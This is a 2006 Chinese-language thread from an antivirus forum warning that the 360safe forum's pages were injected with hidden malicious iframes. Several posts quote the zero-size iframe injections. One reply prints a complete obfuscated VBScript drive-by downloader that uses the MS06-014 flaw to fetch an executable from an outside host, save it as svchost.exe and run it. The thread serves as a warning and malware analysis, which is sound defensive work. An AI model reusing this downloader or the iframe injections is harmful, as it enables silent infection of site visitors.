瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 警报360safe坛子被挂马了,各位小心

1234   1  /  4  页   跳转

警报360safe坛子被挂马了,各位小心

收藏
艾玛
头像
大版主
  • 帖子:18894
  • 注册: 2004-01-01
  • 来自:
卡卡名人堂论坛9周年纪念
发表于: 2006-12-12 09:49 | 只看楼主 短消息 资料
字号: 1楼

警报360safe坛子被挂马了,各位小心


<iframe src='hxxp://www.wshilide.com/wm.htm' width='0' height='0' frameborder='0'></iframe>

<html>

<body>

<IfRAME height=0 width=0 sRc="hxxp://zq101020.a89.zgsj.com/mm.htm"></IFrAME>

<IfRAME height=0 width=0 sRc="hxxp://zq101020.a89.zgsj.com/qw.htm"></IFrAME>

<center><script language="javascript" src="hxxp://count23.51yes.com/click.aspx?id=235529404&logo=1"></script></center>

</body>

</html>

我的贴子文章:http://hi.baidu.com/killvir/blog/item/2f75e711cc1918c6a6ef3ffb.html
sql.com瑞星不报毒,看下图

附件附件:

下载次数:282
文件类型:image/pjpeg
文件大小:
上传时间:2006-12-12 9:49:51
描述:



最后编辑2006-12-12 20:35:18
分享到:
gototop
 
高歌猛进
头像
初生襁褓狮
  • 帖子:2377
  • 注册: 2006-10-09
  • 来自:
发表于: 2006-12-12 09:53 | 短消息 资料
字号: 2楼

看看去
gototop
 
另壶冲
头像
拙长孩提狮
  • 帖子:152
  • 注册: 2005-09-30
  • 来自:
发表于: 2006-12-12 10:32 | 短消息 资料
字号: 3楼

这个还置顶???
gototop
 
scriptman
头像
社区嘉宾
  • 帖子:1315
  • 注册: 2006-03-18
  • 来自:
发表于: 2006-12-12 10:35 | 短消息 资料
字号: 4楼

应该是利用了DISCUZ的漏洞吧。
想赚取广告点击数。
gototop
 
scriptman
头像
社区嘉宾
  • 帖子:1315
  • 注册: 2006-03-18
  • 来自:
发表于: 2006-12-12 10:52 | 短消息 资料
字号: 5楼

刚才又去看了下,360还没有解决:
<center><script language="JavaScript" type="text/javascript" src="http://c6.50bang.com/click.js?user_id=406730&l=602" charset="gb2312"></script></center>
<iframe src='http://www.wshilide.com/wm.htm' width='0' height='0' frameborder='0'></iframe>
http://zq101020.a89.zgsj.com/mm.htm和http://zq101020.a89.zgsj.com/qw.htm加过密。
不会是它们自己搞的吧。
gototop
 
另壶冲
头像
拙长孩提狮
  • 帖子:152
  • 注册: 2005-09-30
  • 来自:
发表于: 2006-12-12 11:05 | 短消息 资料
字号: 6楼

4楼的 http://c6.50bang.com/click.js?user_id=406730&l=602 这个是正常的统计代码
gototop
 
西门大哥
头像
初生襁褓狮
  • 帖子:20
  • 注册: 2006-11-14
  • 来自:
发表于: 2006-12-12 11:12 | 短消息 资料
字号: 7楼

版主!!???kaka的版主都一个个超水平啊...这个也置顶...不会告诉大家那个是你挂的吧



kaka的斑竹也没撒水平..一般般..
顶置这帖也只是提醒..并没有任何其他意思..
同样希望您不要乱说..

by:mopery
gototop
 
独孤豪侠
头像
横据古稀狮
  • 帖子:11896
  • 注册: 2005-08-10
  • 来自:花果山
发表于: 2006-12-12 11:14 | 短消息 资料
字号: 8楼

呵呵...网站被挂马经常有的事.防不胜防呀...
gototop
 
偶,傻掉了
头像
初生襁褓狮
  • 帖子:1
  • 注册: 2006-12-12
  • 来自:
发表于: 2006-12-12 11:23 | 短消息 资料
字号: 9楼

DZ问题多多。
米事 偶不怕 一重起啥都米了。。。哈哈
gototop
 
deadmanzj
头像
特邀体验者
  • 帖子:2592
  • 注册: 2006-07-24
  • 来自:
发表于: 2006-12-12 12:01 | 短消息 资料
字号: 10楼

<script language="VBScript">
on error resume next
    url1="h
ttp://"
    url2="zq101020.a89.zgsj.com/"
    url3="down.ex
e" 
    dl=url1&url2&url3
    j1="clsid:"
    j2="BD96C55
6-"
    j3="65A3-"
    j4="11D0-"
    j5="983A-"
    j6="
00C04FC29E36"
    j7=j1&j2&j3&j4&j5&j6
    xx="object"
 
xxx="classid"
    xxxx="Scripting.FileSystemObject"
    dd
="open"
    Set df = document.createElement(xx)
    df.setA
ttribute xxx, j7
    b4="Mi"
    b5="cr"
    b6="o"
    b
7="soft"
    b8=".X"
    b9="M"
    b10="L"
    b11="H"

    b12="T"
    b13="T"
    b14="P"
    strb1=b4&b5&b6&b7&
b8&b9
    strb2=b10&b11&b12&b13&b14
    strb=strb1&strb2

  Set x = df.CreateObject(strb,"")
    a4="A"
    a5="d"

    a6="o"
    a7="d"
    a8="b"
    a9="."
    a10="S"

    a11="t"
    a12="r"
    a13="e"
    a14="a"
    a15="
m"
    strd1=a4&a5&a6&a7&a8&a9
    strd2=a10&a11&a12&a13&a1
4&a15
    strd=strd1&strd2
    set SS = df.createobject(str
d,"")
    SS.type = 1
    f4="G"
    f5="E"
    f6="T"

  stre=f4&f5&f6
    x.Open stre, dl, False
    x.Send
 
marco1="svchost.exe"
    set F = df.createobject(xxxx,"")

    tmp2=2
    set tmp = F.GetSpecialFolder(tmp2)
    SS.op
en
    marco1= F.BuildPath(tmp,marco1)
    SS.write x.respo
nseBody
    SS.savetofile marco1,2
    SS.close
    z1="Sh
e"
    z2="ll.A"
    z3="ppli"
    z4="cat"
    z5="io"

    z6="n"
    zz=z1&z2&z3&z4&z5&z6
    set Q = df.createob
ject(zz,"")
    Q.ShellExecute marco1,"","",dd,0
    </scri
pt>

利用MS06-14漏洞下载http://zq101020.a89.zgsj.com/down.exe用UPX加壳,大小30,208字节
gototop
 
<<上一主题|下一主题>>
1234   1  /  4  页   跳转
页面顶部
Powered by Discuz!NT